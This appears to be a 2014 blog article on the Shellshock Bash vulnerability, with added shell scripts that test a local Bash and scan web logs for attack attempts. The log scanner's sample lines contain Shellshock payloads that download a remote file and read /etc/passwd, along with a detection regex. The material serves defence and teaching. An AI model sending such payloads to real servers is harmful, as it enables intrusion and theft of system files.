By Ali Sawyer   /   Sep 26th, 2014

Shellshock Vulnerability: A Bigger Threat Than Heartbleed

The security community is scrambling to patch a newly discovered vulnerability in the Bash shell. Known as Shellshock or the Bash bug, the flaw lets an attacker slip past firewalls and into a system by smuggling commands into environment variables that Bash parses when it starts. Bash lets a parent shell export functions to child shells through the environment: a variable whose value begins with "() {" is re-parsed by the child as a function definition. A vulnerable Bash does not stop at the end of that definition; it goes on to execute whatever trailing commands follow it. Any program that lets outside data reach the environment of a Bash process, for example a web server handing HTTP request headers to a CGI script, therefore gives the attacker code execution the moment the shell is launched.
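The mechanism above, as an added example that is not part of the original article: the first function shows the legitimate exported-function feature that Shellshock abuses, and the second runs the widely circulated probe (a harmless function body followed by a trailing `echo`) against whichever `bash` is on PATH. The `BASH_BIN` override and the function names are this example's own assumptions.

```shell
#!/bin/sh
# Added example: probe a bash binary for the Shellshock parsing bug.
# Assumption: the bash to test is on PATH (override with BASH_BIN=/path/to/bash).
BASH_BIN="${BASH_BIN:-bash}"

# The legitimate feature: a function exported with `export -f` travels to a
# child bash through the environment and can be called there. $BASH is set
# by bash itself to the path of the running interpreter.
exported_function_demo() {
  "$BASH_BIN" -c 'f() { echo imported; }; export -f f; exec "$BASH" -c f'
}

# The probe: the variable x looks like an exported function, but a trailing
# command follows the closing brace. A vulnerable bash executes that trailing
# command while importing the environment, before -c 'echo test' ever runs,
# so "vulnerable" shows up in the output. A patched bash ignores or rejects
# the definition (some patched builds print a warning on stderr, discarded here).
shellshock_status() {
  command -v "$BASH_BIN" >/dev/null 2>&1 || { echo no-bash; return; }
  out=$(env x='() { :;}; echo vulnerable' "$BASH_BIN" -c 'echo test' 2>/dev/null)
  case "$out" in
    *vulnerable*) echo vulnerable ;;
    *)            echo patched ;;
  esac
}

# Usage: sh shellshock-probe.sh
exported_function_demo
shellshock_status
```

Run it on every host, not just the ones that look like servers: the probe only tells you about the `bash` it finds, so point `BASH_BIN` at any second copy (for example one bundled inside an appliance image) separately.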


Any software that launches a Bash shell could be exposed, and Bash ships by default on Mac OS X and most Linux distributions. Security experts are especially concerned because Bash is also found on many Linux-based Internet of Things devices, so the vulnerability could extend to increasingly ubiquitous “smart” objects like thermostats and baby monitors.
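Because the remote path into a vulnerable Bash usually runs through a web server that copies request headers into a CGI script's environment, the payload tends to land in the User-Agent or Referer field of ordinary access logs. The following is an added example, not from the original article: it scans constructed Apache combined-format log lines (made up for this example, not real traffic) for the "() {" signature and lists the sending addresses. The function names are this example's own.

```shell
#!/bin/sh
# Added example: spot Shellshock attempts in web access logs.

# Constructed sample lines in Apache "combined" format (not real traffic).
# Lines 1 and 3 carry the function-definition prefix in the User-Agent and
# Referer fields; line 4 contains "()" in the URL but no brace, so it is benign.
sample_log() {
cat <<'EOF'
203.0.113.10 - - [25/Sep/2014:14:02:11 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'wget http://203.0.113.99/x -O /tmp/x'"
198.51.100.7 - - [25/Sep/2014:14:02:15 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.10 - - [25/Sep/2014:14:02:20 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 301 "() { :; }; echo; /bin/cat /etc/passwd" "curl/7.30.0"
198.51.100.7 - - [25/Sep/2014:14:02:25 +0000] "GET /api/run() HTTP/1.1" 404 169 "-" "Mozilla/5.0"
EOF
}

# Bash only treats a value as a function definition when it starts with
# "()" followed by optional whitespace and "{", so that is the signature.
SHELLSHOCK_RE='\(\)[[:space:]]*\{'

# Number of log lines carrying the signature (2 for the sample above).
shellshock_hit_count() {
  sample_log | grep -cE "$SHELLSHOCK_RE"
}

# Unique client addresses that sent a matching request.
shellshock_sources() {
  sample_log | grep -E "$SHELLSHOCK_RE" | awk '{print $1}' | sort -u
}

# Usage: sh shellshock-log-scan.sh  (replace sample_log with: cat /var/log/apache2/access.log)
shellshock_hit_count
shellshock_sources
```

The pattern is deliberately narrow: it matches the prefix Bash itself requires rather than any stray parenthesis, which keeps false positives from URLs and normal browser strings low. A hit in the log means an attempt, not necessarily a compromise; check whether the requested path is actually a CGI script served by a vulnerable Bash.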

Shellshock was given a severity rating of 10 out of 10 by the U.S. National Vulnerability Database. Robert Graham of Errata Security disagrees: “On the scale of 1 to 10, this is an 11,” he told CNET.

One reason Shellshock is especially dangerous is because it “interacts with other software in unexpected ways,” Graham says. Bash is invoked by numerous other programs, making it extremely challenging for IT professionals to identify and patch all the software affected by the vulnerability. This means Shellshock, like Heartbleed, will inflict long-term damage – hackers will continue to exploit it for years. (For reference, Heartbleed was discovered in April 2014 and Venafi Labs reports that 97% of Global 2000 organizations remain vulnerable to it.)


First released in 1989, Bash is getting old by software standards, and some security researchers believe the vulnerability has been present for around 20 years.

Mac users can take action by updating Bash right away. A post on Stack Overflow suggests a simple test to see if your Mac is vulnerable to the bug and how to update Bash. Linux vendors such as Red Hat, Inc. have begun shipping patches, but the first fix turned out to be incomplete and follow-up updates are still being prepared. For now, Red Hat suggests mitigating your risk with a workaround detailed on their blog, and after every update you should rerun the vulnerability test rather than assume the package fixed it. Shellshock is a major threat, but most of the risk is long-term rather than immediate.
